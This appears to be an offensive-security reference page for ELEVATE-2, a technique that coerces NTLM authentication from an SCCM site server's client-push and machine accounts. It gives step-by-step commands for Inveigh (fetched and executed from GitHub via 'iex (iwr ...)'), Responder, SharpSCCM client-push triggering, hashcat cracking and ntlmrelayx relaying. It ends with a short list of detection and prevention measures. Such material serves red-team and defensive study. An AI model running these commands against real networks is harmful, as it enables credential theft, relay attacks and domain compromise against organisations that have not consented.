ELEVATE-2 - Client Push

Document Reference

• ELEVATE-2

Description

It is possible to coerce NTLM authentication from a site servers push installation account and machine account. The NTLM authentication can either be cracked offline or relayed elsewhere for authentication.

Requirements

• SCCM automatic site assignment and automatic client push installation are enabled

• PKI certificates aren’t required for client authentication

• SMB Signing disabled (If relaying authentication)

• Domain user credentials

• Local Administrator (If performing from Windows)

• Fallback to NTLM authentication is not explicitly disabled (default)

Credential Capture

Setup capture

Windows

Setup Inveigh or Invoke-Inveigh to sniff for network traffic (Local Admin Required)

# Binary
Inveigh.exe

# Download
iex (iwr -usebasicparsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)

# Execute
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -HTTPS Y -IP [Local IP>

Linux

Set up Responder to listen for network traffic in analyse mode.

# Responder
sudo python3 /usr/share/Responder.py -I [Interface] -A

Trigger client push installation

Trigger the client push on the site server, targeting the listening host. This process may take a couple of minutes to capture

# SharpSCCM
SharpSCCM.exe invoke client-push -sms [SMS Site IP] -sc [Site Code] -t [Listening IP]

hashcat

hashcat.exe -m 5600 -a 0 -o hash.txt Wordlists\kaonashi14M.txt rules\best64.rule

Relay Authentication

ntlmrelayx Setup

Windows

Before setting up ntlmrelayx on Windows we need to divert SMB traffic on port 445 to an alternate port such as 8445 with divertTCPConn (Local Administrator Required)

divertTCPconn.exe 445 8445

Configure ntlmrelayx

ntlmrelayx.exe --smb-port 8445 -smb2support --smb-port 8445 -ts -t [Relay Target]

Linux

impacket-ntlmrelayx -smb2support -ts -ip [Interface IP] -t [Relay Target]

Trigger Push authentication then wait a minute or two to capture the authentication request.

SharpSCCM.exe invoke client-push -sms [Site Server] -sc [Site Code] -t [Relay IP]

Getting full shells on Windows

The below page demonstrates how to get full shells on Windows with Amnesiac and ntlmrelayx.

TAKEOVER-2

Defensive IDs

• DETECT-1: Monitor site server domain computer accounts authenticating from another source
• DETECT-3: Monitor client push installation accounts authenticating from anywhere other than the primary site server
• PREVENT-1: Patch site server with KB15599094
• PREVENT-2: Disable Fallback to NTLM
• PREVENT-5: Disable automatic side-wide client push installation
• PREVENT-8: Require PKI certificates for client authentation
• PREVENT-11: Disable and uninstall WebClient on site servers
• PREVENT-12: Require SMB signing on site systems